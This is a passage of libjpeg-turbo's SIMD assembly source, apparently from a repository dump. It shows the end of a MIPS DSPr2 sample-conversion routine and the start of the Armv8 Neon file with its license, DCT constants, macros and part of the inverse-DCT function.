lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 20(a0)
swc1 f2, 128(a2)
swc1 f4, 132(a2)
swc1 f6, 136(a2)
addu t0, t0, a1
swc1 f8, 140(a2)
swc1 f10, 144(a2)
swc1 f12, 148(a2)
swc1 f14, 152(a2)
swc1 f16, 156(a2)
/* elemr 5 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 24(a0)
swc1 f2, 160(a2)
swc1 f4, 164(a2)
swc1 f6, 168(a2)
addu t0, t0, a1
swc1 f8, 172(a2)
swc1 f10, 176(a2)
swc1 f12, 180(a2)
swc1 f14, 184(a2)
swc1 f16, 188(a2)
/* elemr 6 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
lw t0, 28(a0)
swc1 f2, 192(a2)
swc1 f4, 196(a2)
swc1 f6, 200(a2)
addu t0, t0, a1
swc1 f8, 204(a2)
swc1 f10, 208(a2)
swc1 f12, 212(a2)
swc1 f14, 216(a2)
swc1 f16, 220(a2)
/* elemr 7 */
lbu t1, 0(t0)
lbu t2, 1(t0)
lbu t3, 2(t0)
lbu t4, 3(t0)
lbu t5, 4(t0)
lbu t6, 5(t0)
lbu t7, 6(t0)
lbu t8, 7(t0)
addiu t1, t1, -128
addiu t2, t2, -128
addiu t3, t3, -128
addiu t4, t4, -128
addiu t5, t5, -128
addiu t6, t6, -128
addiu t7, t7, -128
addiu t8, t8, -128
mtc1 t1, f2
mtc1 t2, f4
mtc1 t3, f6
mtc1 t4, f8
mtc1 t5, f10
mtc1 t6, f12
mtc1 t7, f14
mtc1 t8, f16
cvt.s.w f2, f2
cvt.s.w f4, f4
cvt.s.w f6, f6
cvt.s.w f8, f8
cvt.s.w f10, f10
cvt.s.w f12, f12
cvt.s.w f14, f14
cvt.s.w f16, f16
swc1 f2, 224(a2)
swc1 f4, 228(a2)
swc1 f6, 232(a2)
swc1 f8, 236(a2)
swc1 f10, 240(a2)
swc1 f12, 244(a2)
swc1 f14, 248(a2)
swc1 f16, 252(a2)
j ra
nop
END(jsimd_convsamp_float_dspr2)
#endif
/*****************************************************************************/
|
open-vela/external_libjpeg-turbo | 98,482 | simd/arm/aarch64/jsimd_neon.S | /*
* Armv8 Neon optimizations for libjpeg-turbo
*
* Copyright (C) 2009-2011, Nokia Corporation and/or its subsidiary(-ies).
* All Rights Reserved.
* Author: Siarhei Siamashka <siarhei.siamashka@nokia.com>
* Copyright (C) 2013-2014, Linaro Limited. All Rights Reserved.
* Author: Ragesh Radhakrishnan <ragesh.r@linaro.org>
* Copyright (C) 2014-2016, 2020, D. R. Commander. All Rights Reserved.
* Copyright (C) 2015-2016, 2018, Matthieu Darbois. All Rights Reserved.
* Copyright (C) 2016, Siarhei Siamashka. All Rights Reserved.
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#if defined(__linux__) && defined(__ELF__)
.section .note.GNU-stack, "", %progbits /* mark stack as non-executable */
#endif
#if defined(__APPLE__)
.section __DATA, __const
#elif defined(_WIN32)
.section .rdata
#else
.section .rodata, "a", %progbits
#endif
/* Constants for jsimd_idct_islow_neon() */
#define F_0_298 2446 /* FIX(0.298631336) */
#define F_0_390 3196 /* FIX(0.390180644) */
#define F_0_541 4433 /* FIX(0.541196100) */
#define F_0_765 6270 /* FIX(0.765366865) */
#define F_0_899 7373 /* FIX(0.899976223) */
#define F_1_175 9633 /* FIX(1.175875602) */
#define F_1_501 12299 /* FIX(1.501321110) */
#define F_1_847 15137 /* FIX(1.847759065) */
#define F_1_961 16069 /* FIX(1.961570560) */
#define F_2_053 16819 /* FIX(2.053119869) */
#define F_2_562 20995 /* FIX(2.562915447) */
#define F_3_072 25172 /* FIX(3.072711026) */
.balign 16
Ljsimd_idct_islow_neon_consts:
.short F_0_298
.short -F_0_390
.short F_0_541
.short F_0_765
.short - F_0_899
.short F_1_175
.short F_1_501
.short - F_1_847
.short - F_1_961
.short F_2_053
.short - F_2_562
.short F_3_072
.short 0 /* padding */
.short 0
.short 0
.short 0
#undef F_0_298
#undef F_0_390
#undef F_0_541
#undef F_0_765
#undef F_0_899
#undef F_1_175
#undef F_1_501
#undef F_1_847
#undef F_1_961
#undef F_2_053
#undef F_2_562
#undef F_3_072
/* Constants for jsimd_ycc_*_neon() */
.balign 16
Ljsimd_ycc_rgb_neon_consts:
.short 0, 0, 0, 0
.short 22971, -11277, -23401, 29033
.short -128, -128, -128, -128
.short -128, -128, -128, -128
/* Constants for jsimd_*_ycc_neon() */
.balign 16
Ljsimd_rgb_ycc_neon_consts:
.short 19595, 38470, 7471, 11059
.short 21709, 32768, 27439, 5329
.short 32767, 128, 32767, 128
.short 32767, 128, 32767, 128
/* Constants for jsimd_fdct_islow_neon() */
#define F_0_298 2446 /* FIX(0.298631336) */
#define F_0_390 3196 /* FIX(0.390180644) */
#define F_0_541 4433 /* FIX(0.541196100) */
#define F_0_765 6270 /* FIX(0.765366865) */
#define F_0_899 7373 /* FIX(0.899976223) */
#define F_1_175 9633 /* FIX(1.175875602) */
#define F_1_501 12299 /* FIX(1.501321110) */
#define F_1_847 15137 /* FIX(1.847759065) */
#define F_1_961 16069 /* FIX(1.961570560) */
#define F_2_053 16819 /* FIX(2.053119869) */
#define F_2_562 20995 /* FIX(2.562915447) */
#define F_3_072 25172 /* FIX(3.072711026) */
.balign 16
Ljsimd_fdct_islow_neon_consts:
.short F_0_298
.short -F_0_390
.short F_0_541
.short F_0_765
.short - F_0_899
.short F_1_175
.short F_1_501
.short - F_1_847
.short - F_1_961
.short F_2_053
.short - F_2_562
.short F_3_072
.short 0 /* padding */
.short 0
.short 0
.short 0
#undef F_0_298
#undef F_0_390
#undef F_0_541
#undef F_0_765
#undef F_0_899
#undef F_1_175
#undef F_1_501
#undef F_1_847
#undef F_1_961
#undef F_2_053
#undef F_2_562
#undef F_3_072
/* Constants for jsimd_huff_encode_one_block_neon() */
.balign 16
Ljsimd_huff_encode_one_block_neon_consts:
.byte 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, \
0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
.byte 0, 1, 2, 3, 16, 17, 32, 33, \
18, 19, 4, 5, 6, 7, 20, 21 /* L0 => L3 : 4 lines OK */
.byte 34, 35, 48, 49, 255, 255, 50, 51, \
36, 37, 22, 23, 8, 9, 10, 11 /* L0 => L3 : 4 lines OK */
.byte 8, 9, 22, 23, 36, 37, 50, 51, \
255, 255, 255, 255, 255, 255, 52, 53 /* L1 => L4 : 4 lines OK */
.byte 54, 55, 40, 41, 26, 27, 12, 13, \
14, 15, 28, 29, 42, 43, 56, 57 /* L0 => L3 : 4 lines OK */
.byte 6, 7, 20, 21, 34, 35, 48, 49, \
50, 51, 36, 37, 22, 23, 8, 9 /* L4 => L7 : 4 lines OK */
.byte 42, 43, 28, 29, 14, 15, 30, 31, \
44, 45, 58, 59, 255, 255, 255, 255 /* L1 => L4 : 4 lines OK */
.byte 255, 255, 255, 255, 56, 57, 42, 43, \
28, 29, 14, 15, 30, 31, 44, 45 /* L3 => L6 : 4 lines OK */
.byte 26, 27, 40, 41, 42, 43, 28, 29, \
14, 15, 30, 31, 44, 45, 46, 47 /* L5 => L7 : 3 lines OK */
.byte 255, 255, 255, 255, 0, 1, 255, 255, \
255, 255, 255, 255, 255, 255, 255, 255 /* L4 : 1 lines OK */
.byte 255, 255, 255, 255, 255, 255, 255, 255, \
0, 1, 16, 17, 2, 3, 255, 255 /* L5 => L6 : 2 lines OK */
.byte 255, 255, 255, 255, 255, 255, 255, 255, \
255, 255, 255, 255, 8, 9, 22, 23 /* L5 => L6 : 2 lines OK */
.byte 4, 5, 6, 7, 255, 255, 255, 255, \
255, 255, 255, 255, 255, 255, 255, 255 /* L7 : 1 line OK */
.text
/*****************************************************************************/
/* Supplementary macro for setting function attributes */
.macro asm_function fname
#ifdef __APPLE__
.private_extern _\fname
.globl _\fname
_\fname:
#else
.global \fname
#ifdef __ELF__
.hidden \fname
.type \fname, %function
#endif
\fname:
#endif
.endm
/* Get symbol location */
.macro get_symbol_loc reg, symbol
#ifdef __APPLE__
adrp \reg, \symbol@PAGE
add \reg, \reg, \symbol@PAGEOFF
#else
adrp \reg, \symbol
add \reg, \reg, :lo12:\symbol
#endif
.endm
.macro transpose_8x8 l0, l1, l2, l3, l4, l5, l6, l7, t0, t1, t2, t3
trn1 \t0\().8h, \l0\().8h, \l1\().8h
trn1 \t1\().8h, \l2\().8h, \l3\().8h
trn1 \t2\().8h, \l4\().8h, \l5\().8h
trn1 \t3\().8h, \l6\().8h, \l7\().8h
trn2 \l1\().8h, \l0\().8h, \l1\().8h
trn2 \l3\().8h, \l2\().8h, \l3\().8h
trn2 \l5\().8h, \l4\().8h, \l5\().8h
trn2 \l7\().8h, \l6\().8h, \l7\().8h
trn1 \l4\().4s, \t2\().4s, \t3\().4s
trn2 \t3\().4s, \t2\().4s, \t3\().4s
trn1 \t2\().4s, \t0\().4s, \t1\().4s
trn2 \l2\().4s, \t0\().4s, \t1\().4s
trn1 \t0\().4s, \l1\().4s, \l3\().4s
trn2 \l3\().4s, \l1\().4s, \l3\().4s
trn2 \t1\().4s, \l5\().4s, \l7\().4s
trn1 \l5\().4s, \l5\().4s, \l7\().4s
trn2 \l6\().2d, \l2\().2d, \t3\().2d
trn1 \l0\().2d, \t2\().2d, \l4\().2d
trn1 \l1\().2d, \t0\().2d, \l5\().2d
trn2 \l7\().2d, \l3\().2d, \t1\().2d
trn1 \l2\().2d, \l2\().2d, \t3\().2d
trn2 \l4\().2d, \t2\().2d, \l4\().2d
trn1 \l3\().2d, \l3\().2d, \t1\().2d
trn2 \l5\().2d, \t0\().2d, \l5\().2d
.endm
#define CENTERJSAMPLE 128
/*****************************************************************************/
/*
* Perform dequantization and inverse DCT on one block of coefficients.
*
* GLOBAL(void)
* jsimd_idct_islow_neon(void *dct_table, JCOEFPTR coef_block,
* JSAMPARRAY output_buf, JDIMENSION output_col)
*/
#define CONST_BITS 13
#define PASS1_BITS 2
#define XFIX_P_0_298 v0.h[0]
#define XFIX_N_0_390 v0.h[1]
#define XFIX_P_0_541 v0.h[2]
#define XFIX_P_0_765 v0.h[3]
#define XFIX_N_0_899 v0.h[4]
#define XFIX_P_1_175 v0.h[5]
#define XFIX_P_1_501 v0.h[6]
#define XFIX_N_1_847 v0.h[7]
#define XFIX_N_1_961 v1.h[0]
#define XFIX_P_2_053 v1.h[1]
#define XFIX_N_2_562 v1.h[2]
#define XFIX_P_3_072 v1.h[3]
asm_function jsimd_idct_islow_neon
DCT_TABLE .req x0
COEF_BLOCK .req x1
OUTPUT_BUF .req x2
OUTPUT_COL .req x3
TMP1 .req x0
TMP2 .req x1
TMP3 .req x9
TMP4 .req x10
TMP5 .req x11
TMP6 .req x12
TMP7 .req x13
TMP8 .req x14
/* OUTPUT_COL is a JDIMENSION (unsigned int) argument, so the ABI doesn't
guarantee that the upper (unused) 32 bits of x3 are valid. This
instruction ensures that those bits are set to zero. */
uxtw x3, w3
sub sp, sp, #64
get_symbol_loc x15, Ljsimd_idct_islow_neon_consts
mov x10, sp
st1 {v8.8b, v9.8b, v10.8b, v11.8b}, [x10], #32
st1 {v12.8b, v13.8b, v14.8b, v15.8b}, [x10], #32
ld1 {v0.8h, v1.8h}, [x15]
ld1 {v2.8h, v3.8h, v4.8h, v5.8h}, [COEF_BLOCK], #64
ld1 {v18.8h, v19.8h, v20.8h, v21.8h}, [DCT_TABLE], #64
ld1 {v6.8h, v7.8h, v8.8h, v9.8h}, [COEF_BLOCK], #64
ld1 {v22.8h, v23.8h, v24.8h, v25.8h}, [DCT_TABLE], #64
cmeq v16.8h, v3.8h, #0
cmeq v26.8h, v4.8h, #0
cmeq v27.8h, v5.8h, #0
cmeq v28.8h, v6.8h, #0
cmeq v29.8h, v7.8h, #0
cmeq v30.8h, v8.8h, #0
cmeq v31.8h, v9.8h, #0
and v10.16b, v16.16b, v26.16b
and v11.16b, v27.16b, v28.16b
and v12.16b, v29.16b, v30.16b
and v13.16b, v31.16b, v10.16b
and v14.16b, v11.16b, v12.16b
mul v2.8h, v2.8h, v18.8h
and v15.16b, v13.16b, v14.16b
shl v10.8h, v2.8h, #(PASS1_BITS)
sqxtn v16.8b, v15.8h
mov TMP1, v16.d[0]
mvn TMP2, TMP1
cbnz TMP2, 2f
/* case all AC coeffs are zeros */
dup v2.2d, v10.d[0]
dup v6.2d, v10.d[1]
mov v3.16b, v2.16b
mov v7.16b, v6.16b
mov v4.16b, v2.16b
mov v8.16b, v6.16b
mov v5.16b, v2.16b
mov v9.16b, v6.16b
1:
/* for this transpose, we should organise data like this:
* 00, 01, 02, 03, 40, 41, 42, 43
* 10, 11, 12, 13, 50, 51, 52, 53
* 20, 21, 22, 23, 60, 61, 62, 63
* 30, 31, 32, 33, 70, 71, 72, 73
* 04, 05, 06, 07, 44, 45, 46, 47
* 14, 15, 16, 17, 54, 55, 56, 57
* 24, 25, 26, 27, 64, 65, 66, 67
* 34, 35, 36, 37, 74, 75, 76, 77
*/
trn1 v28.8h, v2.8h, v3.8h
trn1 v29.8h, v4.8h, v5.8h
trn1 v30.8h, v6.8h, v7.8h
trn1 v31.8h, v8.8h, v9.8h
trn2 v16.8h, v2.8h, v3.8h
trn2 v17.8h, v4.8h, v5.8h
trn2 v18.8h, v6.8h, v7.8h
trn2 v19.8h, v8.8h, v9.8h
trn1 v2.4s, v28.4s, v29.4s
trn1 v6.4s, v30.4s, v31.4s
trn1 v3.4s, v16.4s, v17.4s
trn1 v7.4s, v18.4s, v19.4s
trn2 v4.4s, v28.4s, v29.4s
trn2 v8.4s, v30.4s, v31.4s
trn2 v5.4s, v16.4s, v17.4s
trn2 v9.4s, v18.4s, v19.4s
/* Even part: reverse the even part of the forward DCT. */
add v18.8h, v4.8h, v8.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*2], quantptr[DCTSIZE*2]) + DEQUANTIZE(inptr[DCTSIZE*6], quantptr[DCTSIZE*6]) */
add v22.8h, v2.8h, v6.8h /* z2 + z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) + DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull2 v19.4s, v18.8h, XFIX_P_0_541 /* z1h z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sub v26.8h, v2.8h, v6.8h /* z2 - z3 = DEQUANTIZE(inptr[DCTSIZE*0], quantptr[DCTSIZE*0]) - DEQUANTIZE(inptr[DCTSIZE*4], quantptr[DCTSIZE*4]) */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1l z1 = MULTIPLY(z2 + z3, FIX_0_541196100); */
sshll2 v23.4s, v22.8h, #(CONST_BITS) /* tmp0h tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
mov v21.16b, v19.16b /* tmp3 = z1 */
mov v20.16b, v18.16b /* tmp3 = z1 */
smlal2 v19.4s, v8.8h, XFIX_N_1_847 /* tmp2h tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
smlal v18.4s, v8.4h, XFIX_N_1_847 /* tmp2l tmp2 = z1 + MULTIPLY(z3, -FIX_1_847759065); */
sshll2 v27.4s, v26.8h, #(CONST_BITS) /* tmp1h tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
smlal2 v21.4s, v4.8h, XFIX_P_0_765 /* tmp3h tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
smlal v20.4s, v4.4h, XFIX_P_0_765 /* tmp3l tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865); */
sshll v22.4s, v22.4h, #(CONST_BITS) /* tmp0l tmp0 = LEFT_SHIFT(z2 + z3, CONST_BITS); */
sshll v26.4s, v26.4h, #(CONST_BITS) /* tmp1l tmp1 = LEFT_SHIFT(z2 - z3, CONST_BITS); */
add v2.4s, v22.4s, v20.4s /* tmp10l tmp10 = tmp0 + tmp3; */
sub v6.4s, v22.4s, v20.4s /* tmp13l tmp13 = tmp0 - tmp3; */
add v8.4s, v26.4s, v18.4s /* tmp11l tmp11 = tmp1 + tmp2; */
sub v4.4s, v26.4s, v18.4s /* tmp12l tmp12 = tmp1 - tmp2; */
add v28.4s, v23.4s, v21.4s /* tmp10h tmp10 = tmp0 + tmp3; */
sub v31.4s, v23.4s, v21.4s /* tmp13h tmp13 = tmp0 - tmp3; */
add v29.4s, v27.4s, v19.4s /* tmp11h tmp11 = tmp1 + tmp2; */
sub v30.4s, v27.4s, v19.4s /* tmp12h tmp12 = tmp1 - tmp2; */
/* Odd part per figure 8; the matrix is unitary and hence its
* transpose is its inverse. i0..i3 are y7,y5,y3,y1 respectively.
*/
add v22.8h, v9.8h, v5.8h /* z3 = tmp0 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v24.8h, v7.8h, v3.8h /* z4 = tmp1 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v18.8h, v9.8h, v3.8h /* z1 = tmp0 + tmp3 = DEQUANTIZE(inptr[DCTSIZE*7], quantptr[DCTSIZE*7]) + DEQUANTIZE(inptr[DCTSIZE*1], quantptr[DCTSIZE*1]) */
add v20.8h, v7.8h, v5.8h /* z2 = tmp1 + tmp2 = DEQUANTIZE(inptr[DCTSIZE*5], quantptr[DCTSIZE*5]) + DEQUANTIZE(inptr[DCTSIZE*3], quantptr[DCTSIZE*3]) */
add v26.8h, v22.8h, v24.8h /* z5 = z3 + z4 */
smull2 v11.4s, v9.8h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull2 v13.4s, v7.8h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull2 v15.4s, v5.8h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull2 v17.4s, v3.8h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull2 v27.4s, v26.8h, XFIX_P_1_175 /* z5h z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull2 v23.4s, v22.8h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull2 v25.4s, v24.8h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull2 v19.4s, v18.8h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull2 v21.4s, v20.8h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
smull v10.4s, v9.4h, XFIX_P_0_298 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
smull v12.4s, v7.4h, XFIX_P_2_053 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
smull v14.4s, v5.4h, XFIX_P_3_072 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
smull v16.4s, v3.4h, XFIX_P_1_501 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
smull v26.4s, v26.4h, XFIX_P_1_175 /* z5l z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
smull v22.4s, v22.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560) */
smull v24.4s, v24.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644) */
smull v18.4s, v18.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223) */
smull v20.4s, v20.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447) */
add v23.4s, v23.4s, v27.4s /* z3 += z5 */
add v22.4s, v22.4s, v26.4s /* z3 += z5 */
add v25.4s, v25.4s, v27.4s /* z4 += z5 */
add v24.4s, v24.4s, v26.4s /* z4 += z5 */
add v11.4s, v11.4s, v19.4s /* tmp0 += z1 */
add v10.4s, v10.4s, v18.4s /* tmp0 += z1 */
add v13.4s, v13.4s, v21.4s /* tmp1 += z2 */
add v12.4s, v12.4s, v20.4s /* tmp1 += z2 */
add v15.4s, v15.4s, v21.4s /* tmp2 += z2 */
add v14.4s, v14.4s, v20.4s /* tmp2 += z2 */
add v17.4s, v17.4s, v19.4s /* tmp3 += z1 */
add v16.4s, v16.4s, v18.4s /* tmp3 += z1 */
add v11.4s, v11.4s, v23.4s /* tmp0 += z3 */
add v10.4s, v10.4s, v22.4s /* tmp0 += z3 */
add v13.4s, v13.4s, v25.4s /* tmp1 += z4 */
add v12.4s, v12.4s, v24.4s /* tmp1 += z4 */
add v17.4s, v17.4s, v25.4s /* tmp3 += z4 */
add v16.4s, v16.4s, v24.4s /* tmp3 += z4 */
add v15.4s, v15.4s, v23.4s /* tmp2 += z3 */
add v14.4s, v14.4s, v22.4s /* tmp2 += z3 */
/* Final output stage: inputs are tmp10..tmp13, tmp0..tmp3 */
add v18.4s, v2.4s, v16.4s /* tmp10 + tmp3 */
add v19.4s, v28.4s, v17.4s /* tmp10 + tmp3 */
sub v20.4s, v2.4s, v16.4s /* tmp10 - tmp3 */
sub v21.4s, v28.4s, v17.4s /* tmp10 - tmp3 */
add v22.4s, v8.4s, v14.4s /* tmp11 + tmp2 */
add v23.4s, v29.4s, v15.4s /* tmp11 + tmp2 */
sub v24.4s, v8.4s, v14.4s /* tmp11 - tmp2 */
sub v25.4s, v29.4s, v15.4s /* tmp11 - tmp2 */
add v26.4s, v4.4s, v12.4s /* tmp12 + tmp1 */
add v27.4s, v30.4s, v13.4s /* tmp12 + tmp1 */
sub v28.4s, v4.4s, v12.4s /* tmp12 - tmp1 */
sub v29.4s, v30.4s, v13.4s /* tmp12 - tmp1 */
add v14.4s, v6.4s, v10.4s /* tmp13 + tmp0 */
add v15.4s, v31.4s, v11.4s /* tmp13 + tmp0 */
sub v16.4s, v6.4s, v10.4s /* tmp13 - tmp0 */
sub v17.4s, v31.4s, v11.4s /* tmp13 - tmp0 */
shrn v2.4h, v18.4s, #16 /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS+PASS1_BITS+3) */
shrn v9.4h, v20.4s, #16 /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS+PASS1_BITS+3) */
shrn v3.4h, v22.4s, #16 /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS+PASS1_BITS+3) */
shrn v8.4h, v24.4s, #16 /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS+PASS1_BITS+3) */
shrn v4.4h, v26.4s, #16 /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS+PASS1_BITS+3) */
shrn v7.4h, v28.4s, #16 /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS+PASS1_BITS+3) */
shrn v5.4h, v14.4s, #16 /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS+PASS1_BITS+3) */
shrn v6.4h, v16.4s, #16 /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS+PASS1_BITS+3) */
shrn2 v2.8h, v19.4s, #16 /* wsptr[DCTSIZE*0] = (int)DESCALE(tmp10 + tmp3, CONST_BITS+PASS1_BITS+3) */
shrn2 v9.8h, v21.4s, #16 /* wsptr[DCTSIZE*7] = (int)DESCALE(tmp10 - tmp3, CONST_BITS+PASS1_BITS+3) */
shrn2 v3.8h, v23.4s, #16 /* wsptr[DCTSIZE*1] = (int)DESCALE(tmp11 + tmp2, CONST_BITS+PASS1_BITS+3) */
shrn2 v8.8h, v25.4s, #16 /* wsptr[DCTSIZE*6] = (int)DESCALE(tmp11 - tmp2, CONST_BITS+PASS1_BITS+3) */
shrn2 v4.8h, v27.4s, #16 /* wsptr[DCTSIZE*2] = (int)DESCALE(tmp12 + tmp1, CONST_BITS+PASS1_BITS+3) */
shrn2 v7.8h, v29.4s, #16 /* wsptr[DCTSIZE*5] = (int)DESCALE(tmp12 - tmp1, CONST_BITS+PASS1_BITS+3) */
shrn2 v5.8h, v15.4s, #16 /* wsptr[DCTSIZE*3] = (int)DESCALE(tmp13 + tmp0, CONST_BITS+PASS1_BITS+3) */
shrn2 v6.8h, v17.4s, #16 /* wsptr[DCTSIZE*4] = (int)DESCALE(tmp13 - tmp0, CONST_BITS+PASS1_BITS+3) */
movi v0.16b, #(CENTERJSAMPLE)
/* Prepare pointers (dual-issue with Neon instructions) */
ldp TMP1, TMP2, [OUTPUT_BUF], 16
sqrshrn v28.8b, v2.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
ldp TMP3, TMP4, [OUTPUT_BUF], 16
sqrshrn v29.8b, v3.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP1, TMP1, OUTPUT_COL
sqrshrn v30.8b, v4.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP2, TMP2, OUTPUT_COL
sqrshrn v31.8b, v5.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP3, TMP3, OUTPUT_COL
sqrshrn2 v28.16b, v6.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP4, TMP4, OUTPUT_COL
sqrshrn2 v29.16b, v7.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
ldp TMP5, TMP6, [OUTPUT_BUF], 16
sqrshrn2 v30.16b, v8.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
ldp TMP7, TMP8, [OUTPUT_BUF], 16
sqrshrn2 v31.16b, v9.8h, #(CONST_BITS + PASS1_BITS + 3 - 16)
add TMP5, TMP5, OUTPUT_COL
add v16.16b, v28.16b, v0.16b
add TMP6, TMP6, OUTPUT_COL
add v18.16b, v29.16b, v0.16b
add TMP7, TMP7, OUTPUT_COL
add v20.16b, v30.16b, v0.16b
add TMP8, TMP8, OUTPUT_COL
add v22.16b, v31.16b, v0.16b
/* Transpose the final 8-bit samples */
trn1 v28.16b, v16.16b, v18.16b
trn1 v30.16b, v20.16b, v22.16b
trn2 v29.16b, v16.16b, v18.16b
trn2 v31.16b, v20.16b, v22.16b
trn1 v16.8h, v28.8h, v30.8h
trn2 v18.8h, v28.8h, v30.8h
trn1 v20.8h, v29.8h, v31.8h
trn2 v22.8h, v29.8h, v31.8h
uzp1 v28.4s, v16.4s, v18.4s
uzp2 v30.4s, v16.4s, v18.4s
uzp1 v29.4s, v20.4s, v22.4s
uzp2 v31.4s, v20.4s, v22.4s
/* Store results to the output buffer */
st1 {v28.d}[0], [TMP1]
st1 {v29.d}[0], [TMP2]
st1 {v28.d}[1], [TMP3]
st1 {v29.d}[1], [TMP4]
st1 {v30.d}[0], [TMP5]
st1 {v31.d}[0], [TMP6]
st1 {v30.d}[1], [TMP7]
st1 {v31.d}[1], [TMP8]
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], #32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], #32
blr x30
.balign 16
2:
mul v3.8h, v3.8h, v19.8h
mul v4.8h, v4.8h, v20.8h
